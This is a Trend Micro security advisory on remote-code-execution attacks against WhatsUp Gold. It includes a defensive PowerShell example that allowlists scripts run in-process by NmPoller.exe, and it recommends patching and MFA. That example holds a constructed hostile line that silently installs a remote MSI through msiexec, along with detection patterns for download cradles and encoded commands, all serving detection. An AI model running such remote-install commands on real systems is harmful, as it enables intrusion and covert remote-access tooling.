Trend Micro Inc.

09/12/2024 | News release | Distributed by Public on 09/12/2024 03:01

Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities

Observed attack techniques (OAT) detected using Vision One:

  • External MSI Package Installation via Msiexec (High)
  • Suspicious RAT (SimpleHelp) Installation (Medium)
  • Suspicious RAT (AteraAgent) Installation (Medium)
  • Suspicious RAT (Splashtop) File Creation (Medium)
  • Malicious Software - PUA.Win32.RAdmin.E (Medium)

Note that NmPoller.exe runs PowerShell scripts in-process: the Active Monitor PowerShell Script function does not spawn a separate powershell.exe, so process-creation monitoring alone will not show these scripts. If you can inspect PowerShell content through the Antimalware Scan Interface (AMSI) or script block logging, verify that every script executed by WhatsUp Gold's Active Monitor PowerShell Script function is one you deployed. To reduce the monitoring effort, consider suspending the Active Monitor PowerShell Script function until the latest patch is applied.

Also, because CVE-2024-6670 is described as allowing compromise of a user account, an attack may surface as ordinary-looking activity under that account rather than as an obvious exploit event. Until the latest patch is applied, tighten access to WhatsUp Gold as far as possible and closely monitor the events of all related processes.
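The following PowerShell is an added example, not code from the original article or from WhatsUp Gold itself. It assumes PowerShell Script Block Logging is enabled, so that scripts NmPoller.exe runs in-process are recorded as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log; the allowlist, the sample monitor scripts and the heuristic patterns are constructed for this example. It shows one way to check that the scripts NmPoller.exe executed are the ones you expect, and to flag the kind of tooling listed above (a remote MSI pulled down through msiexec, download cradles, encoded commands).

```powershell
# Added example, not part of the original article or of WhatsUp Gold.
# Assumes PowerShell Script Block Logging is enabled: every script block run in
# any PowerShell host, including NmPoller.exe (which hosts PowerShell in-process
# and never launches powershell.exe), is written to
# Microsoft-Windows-PowerShell/Operational as Event ID 4104.

function Get-ScriptHash {
    # SHA-256 of the script text, trimmed so a trailing newline does not change the hash.
    param([Parameter(Mandatory)][string]$ScriptText)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($ScriptText.Trim())
    $sha   = [System.Security.Cryptography.SHA256]::Create()
    try     { ($sha.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join '' }
    finally { $sha.Dispose() }
}

function Test-ActiveMonitorScript {
    # Compares one logged script block against the allowlist of deployed monitor
    # scripts and against heuristics for the tooling seen in this incident.
    # Returns an object with Hash, Allowed and Reasons; nothing is printed.
    param(
        [Parameter(Mandatory)][string]$ScriptText,
        [Parameter(Mandatory)][string[]]$AllowedHashes
    )
    $hash    = Get-ScriptHash -ScriptText $ScriptText
    $reasons = @()
    if ($AllowedHashes -notcontains $hash) { $reasons += 'hash not in allowlist' }
    if ($ScriptText -match '(?i)msiexec(\.exe)?\s[^\r\n]*/i\s+"?https?://') { $reasons += 'msiexec installing a remote MSI' }
    if ($ScriptText -match '(?i)Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer|\biwr\b|\bcurl\b') { $reasons += 'download cradle' }
    if ($ScriptText -match '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}') { $reasons += 'encoded command' }
    [pscustomobject]@{
        Hash    = $hash
        Allowed = ($reasons.Count -eq 0)
        Reasons = $reasons
    }
}

function Get-NmPollerScriptFindings {
    # Live use (run as administrator on the WhatsUp Gold server): read recent
    # 4104 records, keep those emitted by the running NmPoller.exe, test each one
    # and return only the failures. Process IDs only match the current NmPoller
    # instance; for older records correlate ProcessId with 4688 or Sysmon
    # process-creation events instead.
    param(
        [Parameter(Mandatory)][string[]]$AllowedHashes,
        [int]$MaxEvents = 1000
    )
    $pids = @(Get-Process -Name NmPoller -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        Where-Object { $pids -contains $_.ProcessId } |
        ForEach-Object {
            # 4104 event data: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText,
            # [3] ScriptBlockId, [4] Path. Large blocks arrive in several parts
            # (MessageTotal > 1) and need to be reassembled before hashing.
            $r = Test-ActiveMonitorScript -ScriptText ([string]$_.Properties[2].Value) -AllowedHashes $AllowedHashes
            $r | Add-Member -NotePropertyName Time      -NotePropertyValue $_.TimeCreated -PassThru |
                 Add-Member -NotePropertyName ProcessId -NotePropertyValue $_.ProcessId   -PassThru
        } |
        Where-Object { -not $_.Allowed }
}

# ---- Constructed sample data (not real monitor scripts) ----

# The one Active Monitor script this example organisation deployed on purpose.
$expectedMonitor = @'
$ok = Test-NetConnection -ComputerName 10.0.0.5 -Port 443 -InformationLevel Quiet
if ($ok) { exit 0 } else { exit 1 }
'@

# Seed the allowlist from your own deployed scripts, or from 4104 text captured
# during a known-good period (nested script blocks can be logged as separate events).
$allowed = @( Get-ScriptHash -ScriptText $expectedMonitor )

# A script block in the style of the post-exploitation activity described above.
$suspectMonitor = 'msiexec /i https://203.0.113.10/agent.msi /quiet /norestart'

Test-ActiveMonitorScript -ScriptText $expectedMonitor -AllowedHashes $allowed
Test-ActiveMonitorScript -ScriptText $suspectMonitor  -AllowedHashes $allowed

# Live check on the WhatsUp Gold server:
# Get-NmPollerScriptFindings -AllowedHashes $allowed
```

Run stand-alone, the first call reports the deployed script as allowed and the second flags the constructed script twice, once for the unknown hash and once for the remote msiexec install. The hash allowlist is the authoritative check; the regex heuristics only add a reason for triage and will miss anything obfuscated, so an unknown hash should be investigated even when no heuristic fires.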

Conclusion

Patch management is still important but always difficult. In this case, the PoC was published several days after the patch was released, and an incident that appeared to exploit the vulnerability was observed on the same day, only a few hours after the PoC appeared. This shows that when a vulnerability being fixed is rated severe, the patch should be applied as soon as it is released, even if no PoC is yet available.

Preventing incidents like this is not a matter of patch management alone; several defenses should be in place in addition to it. The most common defenses for mitigating the risk are access control and multi-factor authentication (MFA), which security teams can apply through practices such as:

  • Keeping hosts/services for corporate use behind access control instead of publicly reachable
    • Do not expose the management consoles or API endpoints of corporate products to the public internet, so that they do not end up on threat actors' scan lists.
  • Enabling MFA for all network logins
    • To prevent account compromise, every user account (enterprise or personal) that logs on over the network, or into Windows, Linux, or web applications, should have MFA enabled.
    • Also use a strong password that has never been reused anywhere else.
  • Using passkeys
    • If a service offers a passkey instead of a password, use it.
    • A passkey is a cryptographic key stored on the device and unlocked by local authentication such as the user's biometric, in the same way the device itself is unlocked. No password is typed or sent, so there is no secret string for a phishing page to capture, and the key is bound to the legitimate site, which is what makes passkeys resistant to phishing.

Maintaining daily readiness and vigilance against cyberattacks is essential so that emergency response is reserved for what truly requires it. We hope that after reading this article, security teams will once again check, as part of their peacetime preparations, that no unintended hosts or services are exposed to the public internet. This practice is now part of what is known as attack surface management.

Organizations can also consider powerful security technologies such as Trend Vision One™, which offers multilayered protection and behavior detection, helping block malicious tools and services before they can inflict damage on user machines and systems.